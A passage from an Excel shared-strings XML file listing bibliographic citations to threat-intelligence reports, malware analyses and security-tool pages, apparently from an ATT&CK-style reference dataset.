    <t>Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>MalwareTech. (2013, August 13). PowerLoader Injection – Something truly amazing. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.</t>
  </si>
  <si>
    <t>Brumaghin, E. and Grady, C.. (2017, March 2). Covert Channels and Poor Decisions: The Tale of DNSMessenger. Retrieved March 8, 2017.</t>
  </si>
  <si>
    <t>PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.</t>
  </si>
  <si>
    <t>Graeber, M. (2014, July 8). PowerSploit. Retrieved February 6, 2018.</t>
  </si>
  <si>
    <t>PowerSploit. (n.d.). PowerSploit. Retrieved February 6, 2018.</t>
  </si>
  <si>
    <t>Schroeder, W. &amp; Hart M. (2016, October 31). Invoke-Kerberoast. Retrieved March 23, 2018.</t>
  </si>
  <si>
    <t>Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz. Retrieved March 23, 2018.</t>
  </si>
  <si>
    <t>netbiosX. (2017, April 19). Stored Credentials. Retrieved April 6, 2018.</t>
  </si>
  <si>
    <t>Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.</t>
  </si>
  <si>
    <t>Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.</t>
  </si>
  <si>
    <t>ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.</t>
  </si>
  <si>
    <t>Cherepanov, A.. (2016, May 17). Operation Groundbait: Analysis of a surveillance toolkit. Retrieved May 18, 2016.</t>
  </si>
  <si>
    <t>Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A. (2018, April 24). Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide. Retrieved May 16, 2018.</t>
  </si>
  <si>
    <t>The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.</t>
  </si>
  <si>
    <t>Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.1Retrieved May 13, 2015.</t>
  </si>
  <si>
    <t>Pilkington, M.. (2012, December 17). Protecting Privileged Domain Accounts: PsExec Deep-Dive. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Matthews, M. and Backhouse, W. (2021, June 15). Handy guide to a new Fivehands ransomware variant. Retrieved June 24, 2021.</t>
  </si>
  <si>
    <t>Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve"> Dragos, Inc.. (n.d.). Xenotime. Retrieved April 16, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Golovanov, S. (2018, December 6). DarkVishnya: Banks attacked through direct connection to local network. Retrieved May 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Check Point. (2020, November 6). Ransomware Alert: Pay2Key. Retrieved January 4, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Threat Intelligence. (2020, June 25). WastedLocker: Symantec Identifies Wave of Attacks Against U.S. Organizations. Retrieved May 20, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.</t>
  </si>
  <si>
    <t>Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Elovitz, S. &amp; Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated &amp; Spear-Phishing Group. Retrieved </t>
  </si>
  <si>
    <t>Elovitz, S. &amp; Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated &amp; Spear-Phishing Group. Retrieved February 26, 2018.</t>
  </si>
  <si>
    <t>Nicolas Verdier. (n.d.). Retrieved January 29, 2018.</t>
  </si>
  <si>
    <t>Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.</t>
  </si>
  <si>
    <t>Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.</t>
  </si>
  <si>
    <t>Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020.</t>
  </si>
  <si>
    <t>CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.</t>
  </si>
  <si>
    <t>THe DFIR Report. (2020, November 23). PYSA/Mespinoza Ransomware. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>NHS Digital. (2020, October 10). Pysa Ransomware: Another 'big-game hunter' ransomware. Retrieved March 17, 2021.</t>
  </si>
  <si>
    <t>Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Rainey, K. (n.d.). Qbot. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Sette, N. et al. (2020, June 4). Qakbot Malware Now Exfiltrating Emails for Sophisticated Thread Hijacking Attacks. Retrieved September 27, 2021.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.</t>
  </si>
  <si>
    <t>Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.</t>
  </si>
  <si>
    <t>MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.</t>
  </si>
  <si>
    <t>United States District Court Southern District of New York (USDC SDNY) . (2018, December 17). United States of America v. Zhu Hua and Zhang Shilong. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>SophosLabs. (2020, May 21). Ragnar Locker ransomware deploys virtual machine to dodge security. Retrieved June 29, 2020.</t>
  </si>
  <si>
    <t>Gold, B. (2020, April 27). Cynet Detection Report: Ragnar Locker Ransomware. Retrieved June 29, 2020.</t>
  </si>
  <si>
    <t>FBI. (2020, November 19). Indicators of Compromise Associated with Ragnar Locker Ransomware. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Symantec Threat Hunter Team. (2021, January 18). Raindrop: New Malware Discovered in SolarWinds Investigation. Retrieved January 19, 2021.</t>
  </si>
  <si>
    <t>MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>Sanmillan, I.. (2020, May 13). Ramsay: A cyber‑espionage toolkit tailored for air‑gapped networks. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>Antiy CERT. (2020, April 20). Analysis of Ramsay components of Darkhotel's infiltration and isolation network. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Camba, A. (2013, February 27). BKDR_RARSTONE: New RAT to Watch Out For. Retrieved January 8, 2016.</t>
  </si>
  <si>
    <t>ThreatConnect Inc. and Defense Group Inc. (DGI). (2015, September 23). Project CameraShy: Closing the Aperture on China's Unit 78020. Retrieved December 17, 2015.</t>
  </si>
  <si>
    <t>Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.</t>
  </si>
  <si>
    <t>Edwards, M. (2007, March 14). EldoS Provides Raw Disk Access for Vista and XP. Retrieved March 26, 2019.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Destructive Malware Report. Retrieved March 2, 2016.</t>
  </si>
  <si>
    <t>Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>Novetta Threat Research Group. (2016, February 24). Operation Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February 25, 2016.</t>
  </si>
  <si>
    <t>Nesbit, B. and Ackerman, D. (2017, January). Malware Analysis Report - RawPOS Malware: Deconstructing an Intruder’s Toolkit. Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>TrendLabs Security Intelligence Blog. (2015, April). RawPOS Technical Brief. Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>Visa. (2015, March). Visa Security Alert: "RawPOS" Malware Targeting Lodging Merchants. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Higgins, K. (2015, October 13). Prolific Cybercrime Gang Favors Legit Login Credentials. Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>DiabloHorn. (2015, March 22). mempdump. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.</t>
  </si>
  <si>
    <t>Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020.</t>
  </si>
  <si>
    <t>Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.</t>
  </si>
  <si>
    <t>Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.</t>
  </si>
  <si>
    <t>Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2016, August 7). Strider: Cyberespionage group turns eye of Sauron on targets. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, August 8). ProjectSauron: top level cyber-espionage platform covertly extracts encrypted government comms. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Kaspersky Lab's Global Research &amp; Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.</t>
  </si>
  <si>
    <t>Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Smith, L. and Read, B.. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.</t>
  </si>
  <si>
    <t>Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.</t>
  </si>
  <si>
    <t>Gannon, M. (2019, February 11). With Upgrades in Delivery and Support Infrastructure, Revenge RAT Malware is a Bigger Threat. Retrieved May 1, 2019.</t>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.</t>
  </si>
  <si>
    <t>Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.</t>
  </si>
  <si>
    <t>Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.</t>
  </si>
  <si>
    <t>Hromcová, Z., Cherepanov, A. (2021). Anatomy of Native IIS Malware. Retrieved September 9, 2021.</t>
  </si>
  <si>
    <t>AhnLab. (2018, June 23). Targeted attacks by Andariel Threat Group, a subgroup of the Lazarus. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019.</t>
  </si>
  <si>
    <t>Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.</t>
  </si>
  <si>
    <t>Lee, S. (2019, May 17). CB TAU Threat Intelligence Notification: RobbinHood Ransomware Stops 181 Windows Services Before Encryption. Retrieved July 29, 2019.</t>
  </si>
  <si>
    <t>Duncan, I., Campbell, C. (2019, May 7). Baltimore city government computer network hit by ransomware attack. Retrieved July 29, 2019.</t>
  </si>
  <si>
    <t>Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.</t>
  </si>
  <si>
    <t>Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.</t>
  </si>
  <si>
    <t>GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.</t>
  </si>
  <si>
    <t>T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Route. Retrieved April 17, 2016.</t>
  </si>
  <si>
    <t>Ray, V., Hayashi, K. (2016, February 29). New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan. Retrieved February 29, 2016.</t>
  </si>
  <si>
    <t>Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.</t>
  </si>
  <si>
    <t>Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.</t>
  </si>
  <si>
    <t>Eisenkraft, K., Olshtein, A. (2019, October 17). Pony’s C&amp;C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>SensePost. (2017, September 21). NotRuler - The opposite of Ruler, provides blue teams with the ability to detect Ruler usage against Exchange. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>Wu Zhou, Deyu Hu, Jimmy Su, Yong Kang. (2016, April 26). RUMMS: THE LATEST FAMILY OF ANDROID MALWARE ATTACKING USERS IN RUSSIA VIA SMS PHISHING. Retrieved February 6, 2017.</t>
  </si>
  <si>
    <t>Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>Podlosky, A., Hanel, A. et al. (2020, October 16). WIZARD SPIDER Update: Resilient, Reactive and Resolute. Retrieved June 15, 2021.</t>
  </si>
  <si>
    <t>ANSSI. (2021, February 25). RYUK RANSOMWARE. Retrieved March 29, 2021.</t>
  </si>
  <si>
    <t>Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.</t>
  </si>
  <si>
    <t>1The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.</t>
  </si>
  <si>
    <t>US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>Ventura, V. (2018, January 22). SamSam - The Evolution Continues Netting Over $325,000 in 4 Weeks. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Palotay, D. and Mackenzie, P. (2018, April). SamSam Ransomware Chooses Its Targets Carefully. Retrieved April 15, 2019.</t>
  </si>
  <si>
    <t>Symantec Security Response Attack Investigation Team. (2018, October 30). SamSam: Targeted Ransomware Attacks Continue. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.</t>
  </si>
  <si>
    <t>Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.</t>
  </si>
  <si>
    <t>Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.</t>
  </si>
  <si>
    <t>Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.</t>
  </si>
  <si>
    <t>Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.</t>
  </si>
  <si>
    <t>Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.</t>
  </si>
  <si>
    <t>Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group’s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.</t>
  </si>
  <si>
    <t>Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>GReAT. (2017, August 15). ShadowPad in corporate networks. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>Kaspersky Lab. (2017, August). ShadowPad: popular server management software hit in supply chain attack. Retrieved March 22, 2021.</t>
  </si>
  <si>
    <t>Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.</t>
  </si>
  <si>
    <t>FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Ilascu, I. (2020, December 14). Hacking group’s new malware abuses Google and Facebook services. Retrieved December 28, 2020.</t>
  </si>
  <si>
    <t>Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.</t>
  </si>
  <si>
    <t>Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>Eng, E., Caselden, D.. (2015, June 23). Operation Clandestine Wolf – Adobe Flash Zero-Day in APT3 Phishing Campaign. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Falcone, R. and Wartell, R.. (2015, July 27). Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved January 22, 2016.</t>
  </si>
  <si>
    <t>Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.</t>
  </si>
  <si>
    <t>Prizmant, D. (2021, June 7). Siloscape: First Known Malware Targeting Windows Containers to Compromise Cloud Environments. Retrieved June 9, 2021.</t>
  </si>
  <si>
    <t>Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.</t>
  </si>
  <si>
    <t>Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis. Retrieved April 8, 2019.</t>
  </si>
  <si>
    <t>Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.</t>
  </si>
  <si>
    <t>Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.</t>
  </si>
  <si>
    <t>Kervella, R. (2019, August 4). Cross-platform General Purpose Implant Framework Written in Golang. Retrieved July 30, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver DNS C2 . Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver HTTP(S) CRetrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Transport Encryption. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Download. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (2021, August 18). Sliver Filesystem. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Upload. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Screenshot. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Ifconfig. Retrieved September 16, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Netstat. Retrieved September 16, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.</t>
  </si>
  <si>
    <t>Costin Raiu. (2020, October 2). Costin Raiu Twitter IAmTheKing SlothfulMedia. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020.</t>
  </si>
  <si>
    <t>Ivan Kwiatkowski, Pierre Delcher, Felix Aime. (2020, October 15). IAmTheKing and the SlothfulMedia malware family. Retrieved October 15, 2020.</t>
  </si>
  <si>
    <t>ESET Research. (2020, October 1). ESET Research Tweet Linking Slothfulmedia and PowerPool. Retrieved November 17, 2020.</t>
  </si>
  <si>
    <t>Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.</t>
  </si>
  <si>
    <t>Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.</t>
  </si>
  <si>
    <t>Baker, B., Unterbrink H. (2018, July 03). Smoking Guns - Smoke Loader learned new tricks. Retrieved July 5, 2018.</t>
  </si>
  <si>
    <t>FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.</t>
  </si>
  <si>
    <t>National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.</t>
  </si>
  <si>
    <t>CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.</t>
  </si>
  <si>
